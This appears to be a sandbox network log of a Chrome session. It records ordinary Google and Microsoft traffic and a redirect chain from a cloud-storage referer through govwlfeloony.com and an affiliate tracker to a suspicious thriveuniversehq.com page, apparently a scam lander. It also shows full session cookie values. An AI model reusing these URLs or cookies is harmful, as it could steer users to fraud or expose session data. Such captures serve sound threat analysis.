                                                          2023-11-27 03:23:40 UTC732INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 73 63 72 69 70 74 2d 73 72 63 20 27 72 65 70 6f 72 74 2d 73 61 6d 70 6c 65 27 20 27 6e 6f 6e 63 65 2d 48 74 74 54 44 55 32 31 6a 59 77 6d 6f 33 75 63 49 33 59 6f 6e 77 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 73 74 72 69 63 74 2d 64 79 6e 61 6d 69 63 27 20 68 74 74 70 73 3a 20 68 74 74 70 3a 3b 6f 62 6a 65 63 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 63 73 70 2e 77 69 74 68 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 73 70 2f 63 6c 69 65 6e 74 75 70 64 61 74 65 2d 61 75 73 2f 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c
                                                          Data Ascii: HTTP/1.1 200 OKContent-Security-Policy: script-src 'report-sample' 'nonce-HttTDU21jYwmo3ucI3Yonw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control
                                                          2023-11-27 03:23:40 UTC520INData Raw: 32 63 39 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 31 37 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 36 39 38 32 30 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                          Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6173" elapsed_seconds="69820"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                          2023-11-27 03:23:40 UTC200INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a
                                                          Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                                                          2023-11-27 03:23:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549706172.253.63.844434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:40 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                          Host: accounts.google.com
                                                          Connection: keep-alive
                                                          Content-Length: 1
                                                          Origin: https://www.google.com
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: empty
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                          2023-11-27 03:23:40 UTC1OUTData Raw: 20
                                                          Data Ascii:
                                                          2023-11-27 03:23:40 UTC1627INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 50 72
                                                          Data Ascii: HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8Access-Control-Allow-Origin: https://www.google.comAccess-Control-Allow-Credentials: trueX-Content-Type-Options: nosniffCache-Control: no-cache, no-store, max-age=0, must-revalidatePr
                                                          2023-11-27 03:23:40 UTC23INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                          Data Ascii: 11["gaia.l.a.r",[]]
                                                          2023-11-27 03:23:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549714142.251.167.1044434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:42 UTC955OUTGET /images/icons/product/cloud_storage-32.png HTTP/1.1
                                                          Host: www.google.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://storage.googleapis.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                          2023-11-27 03:23:42 UTC670INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 73 74 61 74 69 63 2d 6f 6e 2d 62 69 67 74 61 62 6c 65 22 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 73 74 61 74 69 63 2d 6f 6e 2d 62 69 67 74 61 62 6c 65 22 2c 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e
                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Type: image/pngCross-Origin-Resource-Policy: cross-originCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"Report-To: {"group":"static-on-bigtable","max_age":2592000,"en
                                                          2023-11-27 03:23:42 UTC582INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 03 19 49 44 41 54 58 c3 cd 97 dd 6b d3 50 18 c6 83 37 ea ed 10 ff 84 dd 28 c8 c6 50 44 71 fd 48 ba 75 0c 3b 2f 74 75 30 61 e8 86 55 71 8c 31 d0 75 28 36 4d 5a 6d ad ab db 98 ba 2f 86 4c c1 4b 91 81 8c 81 57 fb 0f 44 f6 65 bb 8f 8b b9 2d 5d d6 36 6d d3 26 3d 9e d3 b4 83 b0 b6 49 fa 01 3b f0 a3 17 c9 fb 3c 4f 72 4e 7a de 83 61 27 7d 00 00 ce 76 4f a5 1b 1e ce 88 9a e8 9e 12 1b 50 6d 59 e6 d6 51 b1 cf 40 0b 40 4f 8b 25 22 00 eb 98 38 a0 d9 78 e0 ab 88 3d fd 2c 5e 44 02 46 57 79 20 8d 27 b3 42 5d d7 84 a8 2d 44 8b 57 f8 63 74 a5 40 25 30 7b 84 15 4d e6 1d 63 a9 bb 7a 2a 09 8c 74 65 30 40 2d eb 48 ea 9e a2 31 9f 02 99 5f 93 2b 19 c3 61 61 25 21 5c 49 1e 69
                                                          Data Ascii: PNGIHDR szzIDATXkP7(PDqHu;/tu0aUq1u(6MZm/LKWDe-]6m&=I;<OrNza'}vOPmYQ@@O%"8x=,^DFWy 'B]-DWct@%0{Mcz*te0@-H1_+aa%!\Ii
                                                          2023-11-27 03:23:42 UTC268INData Raw: 91 00 12 f8 51 88 d2 b8 31 18 00 f7 47 b6 af d5 f6 32 c7 37 23 8b 87 fd 41 a0 79 52 00 27 19 cd 9f 63 8e 16 47 f0 67 de 9d f0 db 52 02 6e c7 89 1a c9 24 a4 08 4e ee 43 c1 75 cd 01 7c df f7 cf cd 2c 1e 14 69 48 bc 2c ad 26 80 3c 84 3a 5a 9d 41 4f d1 6e 28 29 48 ed 52 13 c5 70 26 27 03 94 20 10 e4 1e 14 5f 03 7a 88 ae 00 e8 9a 61 68 3d 81 b4 63 7c 5a b9 29 ed 1c 65 ad e8 e9 4c 4e 75 10 e4 2e 34 59 cd 18 e5 a3 71 70 15 b4 7b 82 9d 9a 3a e3 56 17 f3 db 84 42 a8 84 70 fc 03 7a 68 94 8f a6 17 6b cb 9a cc 9f cd 85 b1 be 59 f6 02 ee d8 83 e2 ea 91 42 ac c8 68 7c be 02 1e 8f 6f 5e ea 9b d8 d6 7e 34 eb f0 87 7a 09 18 02 77 ec aa e7 d5 0e 34 5d ce a0 83 dc 71 07 fa cb 3d 9c 9e ee f9 10 aa b3 7d 52 4f cf f8 4e 7d 97 3f 50 0f 6b cf 9c f8 d3 f7 7f 4c 43 26 8f bb 11 b4
                                                          Data Ascii: Q1G27#AyR'cGgRn$NCu|,iH,&<:ZAOn()HRp&' _zah=c|Z)eLNu.4Yqp{:VBpzhkYBh|o^~4zw4]q=}RON}?PkLC&


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.54971238.62.240.1224434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:42 UTC709OUTGET /2FRNJG5BQ/GZHBQPR/ HTTP/1.1
                                                          Host: www.govwlfeloony.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Referer: https://storage.googleapis.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:23:42 UTC595INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 73 76 79 6c 73 74 2e 63 6f 6d 2f 61 66 66 5f 63 3f 6f 66 66 65 72 5f 69 64 3d 34 33 37 26 61 66 66 5f 69 64 3d 31 31 38 39 26 61 66 66 5f 73 75 62 3d 73 74 61 74 65 66 61 72 6d 32 26 61 66 66 5f 73 75 62 32 3d
                                                          Data Ascii: HTTP/1.1 302 FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Nov 2023 03:23:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 178Connection: closeLocation: http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=
                                                          2023-11-27 03:23:42 UTC178INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 76 79 6c 73 74 2e 63 6f 6d 2f 61 66 66 5f 63 3f 6f 66 66 65 72 5f 69 64 3d 34 33 37 26 61 6d 70 3b 61 66 66 5f 69 64 3d 31 31 38 39 26 61 6d 70 3b 61 66 66 5f 73 75 62 3d 73 74 61 74 65 66 61 72 6d 32 26 61 6d 70 3b 61 66 66 5f 73 75 62 32 3d 61 30 65 31 34 62 37 64 35 30 33 35 34 34 37 30 62 35 31 33 33 64 30 38 34 38 65 35 38 61 39 35 26 61 6d 70 3b 61 66 66 5f 73 75 62 33 3d 37 30 34 37 35 33 26 61 6d 70 3b 61 66 66 5f 73 75 62 34 3d 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                          Data Ascii: <a href="http://svylst.com/aff_c?offer_id=437&amp;aff_id=1189&amp;aff_sub=statefarm2&amp;aff_sub2=a0e14b7d50354470b5133d0848e58a95&amp;aff_sub3=704753&amp;aff_sub4=">Found</a>.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549716142.251.163.1054434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:42 UTC665OUTGET /images/icons/product/cloud_storage-32.png HTTP/1.1
                                                          Host: www.google.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                          2023-11-27 03:23:42 UTC670INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 73 74 61 74 69 63 2d 6f 6e 2d 62 69 67 74 61 62 6c 65 22 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 67 72 6f 75 70 22 3a 22 73 74 61 74 69 63 2d 6f 6e 2d 62 69 67 74 61 62 6c 65 22 2c 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e
                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Type: image/pngCross-Origin-Resource-Policy: cross-originCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"Report-To: {"group":"static-on-bigtable","max_age":2592000,"en
                                                          2023-11-27 03:23:42 UTC582INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 03 19 49 44 41 54 58 c3 cd 97 dd 6b d3 50 18 c6 83 37 ea ed 10 ff 84 dd 28 c8 c6 50 44 71 fd 48 ba 75 0c 3b 2f 74 75 30 61 e8 86 55 71 8c 31 d0 75 28 36 4d 5a 6d ad ab db 98 ba 2f 86 4c c1 4b 91 81 8c 81 57 fb 0f 44 f6 65 bb 8f 8b b9 2d 5d d6 36 6d d3 26 3d 9e d3 b4 83 b0 b6 49 fa 01 3b f0 a3 17 c9 fb 3c 4f 72 4e 7a de 83 61 27 7d 00 00 ce 76 4f a5 1b 1e ce 88 9a e8 9e 12 1b 50 6d 59 e6 d6 51 b1 cf 40 0b 40 4f 8b 25 22 00 eb 98 38 a0 d9 78 e0 ab 88 3d fd 2c 5e 44 02 46 57 79 20 8d 27 b3 42 5d d7 84 a8 2d 44 8b 57 f8 63 74 a5 40 25 30 7b 84 15 4d e6 1d 63 a9 bb 7a 2a 09 8c 74 65 30 40 2d eb 48 ea 9e a2 31 9f 02 99 5f 93 2b 19 c3 61 61 25 21 5c 49 1e 69
                                                          Data Ascii: PNGIHDR szzIDATXkP7(PDqHu;/tu0aUq1u(6MZm/LKWDe-]6m&=I;<OrNza'}vOPmYQ@@O%"8x=,^DFWy 'B]-DWct@%0{Mcz*te0@-H1_+aa%!\Ii
                                                          2023-11-27 03:23:42 UTC268INData Raw: 91 00 12 f8 51 88 d2 b8 31 18 00 f7 47 b6 af d5 f6 32 c7 37 23 8b 87 fd 41 a0 79 52 00 27 19 cd 9f 63 8e 16 47 f0 67 de 9d f0 db 52 02 6e c7 89 1a c9 24 a4 08 4e ee 43 c1 75 cd 01 7c df f7 cf cd 2c 1e 14 69 48 bc 2c ad 26 80 3c 84 3a 5a 9d 41 4f d1 6e 28 29 48 ed 52 13 c5 70 26 27 03 94 20 10 e4 1e 14 5f 03 7a 88 ae 00 e8 9a 61 68 3d 81 b4 63 7c 5a b9 29 ed 1c 65 ad e8 e9 4c 4e 75 10 e4 2e 34 59 cd 18 e5 a3 71 70 15 b4 7b 82 9d 9a 3a e3 56 17 f3 db 84 42 a8 84 70 fc 03 7a 68 94 8f a6 17 6b cb 9a cc 9f cd 85 b1 be 59 f6 02 ee d8 83 e2 ea 91 42 ac c8 68 7c be 02 1e 8f 6f 5e ea 9b d8 d6 7e 34 eb f0 87 7a 09 18 02 77 ec aa e7 d5 0e 34 5d ce a0 83 dc 71 07 fa cb 3d 9c 9e ee f9 10 aa b3 7d 52 4f cf f8 4e 7d 97 3f 50 0f 6b cf 9c f8 d3 f7 7f 4c 43 26 8f bb 11 b4
                                                          Data Ascii: Q1G27#AyR'cGgRn$NCu|,iH,&<:ZAOn()HRp&' _zah=c|Z)eLNu.4Yqp{:VBpzhkYBh|o^~4zw4]q=}RON}?PkLC&


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.5497202.22.76.127443
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2023-11-27 03:23:45 UTC436INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 70 69 56 65 72 73 69 6f 6e 3a 20 44 69 73 74 72 69 62 75 74 65 20 31 2e 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 6e 66 69 67 2e 6a 73 6f 6e 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 63 6f 6e 66 69 67 2e 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 45 54 61 67 3a 20 22 30 78 36 34 36 36 37 46 37 30 37 46 46 30 37 44 36 32 42 37 33 33 44 42 43 42 37 39 45 46 45 33 38 35 35 45 36 38 38 36 43 39 39 37 35 42 30 43 30 42 34 36 37 44 34 36 32 33 31 42 33 46 41 35 45 37 22 0d 0a 4c 61 73 74 2d 4d 6f 64 69
                                                          Data Ascii: HTTP/1.1 200 OKApiVersion: Distribute 1.1Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.jsonContent-Type: application/octet-streamETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"Last-Modi


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.549721104.21.78.1404434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:45 UTC869OUTGET /aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=&view=fb31fd86985514de1142f2f6b3bcea13_0 HTTP/1.1
                                                          Host: svylst.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Referer: http://svylst.com/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
                                                          2023-11-27 03:23:46 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 3b 20 53 65 63 75 72 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e
                                                          Data Ascii: HTTP/1.1 302 FoundDate: Mon, 27 Nov 2023 03:23:46 GMTContent-Type: text/plain; charset=utf-8; SameSite=None; SecureContent-Length: 0Connection: closeAlt-Svc: h3=":443"; ma=86400Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, n
                                                          2023-11-27 03:23:46 UTC3602INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 73 6f 66 61 2e 74 68 72 69 76 65 75 6e 69 76 65 72 73 65 68 71 2e 63 6f 6d 2f 79 75 66 61 70 65 73 6f 2f 79 65 6a 65 2f 73 75 64 75 6c 65 78 75 2f 72 6f 63 61 6c 69 62 75 2f 7a 6f 2f 69 6e 64 65 78 2e 70 68 70 23 2f 79 75 66 61 70 65 73 6f 2f 79 65 6a 65 2f 73 75 64 75 6c 65 78 75 2f 72 6f 63 61 6c 69 62 75 2f 7a 6f 2f 69 6e 64 65 78 2e 70 68 70 3f 72 70 63 6c 6b 3d 6b 4b 6b 50 77 6f 4e 6a 30 6a 69 42 48 25 32 42 74 4e 45 48 59 62 42 59 25 32 46 49 67 55 25 32 42 79 25 32 46 74 52 58 67 55 44 4a 36 69 70 52 31 66 50 47 6a 4f 74 6f 58 79 52 4e 78 59 73 38 42 58 36 56 71 76 41 7a 72 49 67 39 70 4f 67 58 6a 55 4a 6b 38 78 39 25 32 42 74 30 41 25 32 46 47 6b 55 63 33 59 37 46 4b 25 32 42 7a 78 66 55 31 78
                                                          Data Ascii: Location: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php#/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1x
